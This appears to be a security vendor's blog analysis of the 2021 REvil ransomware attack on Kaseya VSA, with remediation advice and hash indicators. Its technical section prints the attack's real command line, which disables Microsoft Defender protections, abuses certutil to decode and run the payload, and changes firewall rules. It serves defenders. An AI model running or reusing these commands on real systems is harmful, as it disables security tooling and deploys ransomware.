REvil Returns: Diving Deeper Into the Kaseya VSA Ransomware Attack

Estimated reading time: 5 minutes

In a recent event, Kaseya – the US-based software provider for MSPs and IT Teams has reported a worldwide Supply Chain Attack on July 2, 2021 taking advantage of US Independence Day as a leverage since the strength of staffs to monitor the attack would be less. The hacker group exploited the zero-day vulnerability in the Kaseya VSA software to deploy the REvil ransomware to clients. The attack leveraged by the REvil gang may have affected about 60 MSPs and their business customers using the supply chain technique. The attackers have demanded a high ransom for the decryption process or have threatened to leak the information if they don’t pay the ransom.

What is REvil/Sodinokibi?

REvil/Sodinokibi/Sodin is a re-branding of GrandCrab ransomware linked to the financially motivated GOLD SOUTHFIELD group. The group is known to steal victims’ data before encryption and threatens to release it if the ransom is not paid.

They have been active since April 2019 and have caused close to 40% of total ransomware infections globally. Initially, the group targeted Asia and the European regions, but now they have made their way worldwide.

When the ransomware first emerged, it exploited vulnerabilities in servers and other critical assets of SMBs and software installers to exploit kits. But now, they have started their trend towards supply chain attacks. We have already published blog regards to GrandCrab, which closely resembles the REvil ransomware attack.

How did the attackers get in?

The hackers launched attack on MSP providers and exploited the zero-day vulnerability [CVE-2021-30116]  in on-premise VSA servers. By infiltrating the VSA Server, any attached client will perform whatever task the VSA server requests without question. The attackers behind it are disabling administrative access to VSA once they access the victim’s network.

It is found that the attackers used the below IP addresses to initiate the attack while using user “agent curl/7.69.1.”

  • 18[.]223.199.234
  • 161[.]35.239.148
  • 35[.]226.94.113
  • 162[.]253.124.162

Unlike the SolarWinds supply chain attack, the servers of Kaseya do not have any indication of compromise. Many of Kaseya’s customers are MSPs. The hackers exploited the on-premise version of the software and could easily pass the ransomware attack downstream.

The amount demanded by the group goes from $50,000 to $5 Million depending upon if the system is connected to a domain or not. Also, they have demanded $70 million for the universal decryptor, which is posted on their dark website.


The technical details of Kaseya VSA zero-day attack

  1. The initial stage begins when the malicious process from Managed Service Providers (MSPs) reaches the users.
  2. The VSA process deployed the encryption named “Kaseya VSA Agent Hotfix,” which runs in the system with admin access to bypass security measures for processing the update.
  3. The executed script is given below, which disables -Microsoft Defender service, DisableRealtimeMonitoring, DisableIntrusionPreventionSystem, DisableIOAVProtectio, DisableScriptScanning.
    “C:WINDOWSsystem32cmd.exe” /c ping -n 4979 > nul & C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% >> C:Windowscert.exe & C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe


  4. When this update is processed, it delivers REvil payload with malicious executable loader “agent.exe”
  5. The Agent.exe has a valid digital signature signed by “PE03 TRANSPORT LTD” and was signed a day before the attack

    Calling of the side-loaded Mpsvc.dll using MsMpEng.exe

  6. Using the “MsMpEng.exe” the “Mpscv.dll” is side-loaded to run the ransomware.
  7. The overall process chain is depicted as below

    Overall process

On execution of the REvil Ransomware.

netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes


Kaseya has released the patch on July 11 and also has brought the VSA SaaS infrastructure back online. The patch can be downloaded from here. They have also released a tool for scanning potential exploit risk detection in the VSA server and for endpoint scanning. Download it here.  Ransomware is the most severe problem which disrupts operations. The key motivation for this is the financial benefits that the attackers get. We cannot stop targeted attacks but can prevent them.

Seqrite advises organizations to be on alert of the growing risk of ransomware attacks and be prepared with incident response plans and a team that can escalate issues.

The proactive ways to prevent/limit these type of attacks is to

  • Include the supply chain in your response and remediation plan.
  • Map out the threat landscape.
  • Make sure your supply chain vendors have structured, validated, and certified security policies and procedures.
  • Maintain current backups of valuable data to mitigate the damage caused.

How Seqrite protects its users?

Quick Heal provides proactive tools to block the ransomware payload in this wave of attacks. Quick Heal detects the samples with the following detection names:

  • Trojanransom.Gen
  • Trojanransom.Sodin
  • Ransom.Revil
  • Trojanransom.Encoder
  • Trojan.Agent

Indicators of Compromise (IoCs)


  • 0299e3c2536543885860c7b61e1efc3f
  • 5a97a50e45e64db41049fd88a75f2dd2
  • be6c46239e9c753de227bf1f3428e271
  • 835f242dde220cc76ee5544119562268
  • 18786bfac1be0ddf23ff94c029ca4d63
  • 8535397007ecb56d666b666c3592c26d
  • 561cffbaba71a6e8cc1cdceda990ead4


  • 78066A1C4E075941272A86D4A8E49471
  • 040818b1b3c9b1bf8245f5bcb4eebbbc
  • 849fb558745e4089a8232312594b21d2
  • 4a91cb0705539e1d09108c60f991ffcf
  • 7d1807850275485397ce2bb218eff159
  • a560890b8af60b9824c73be74ef24a46
  • a47cf00aedf769d60d58bfe00c0b5421

REvil Configuration File





Source link

Leave a Comment

Your email address will not be published. Required fields are marked *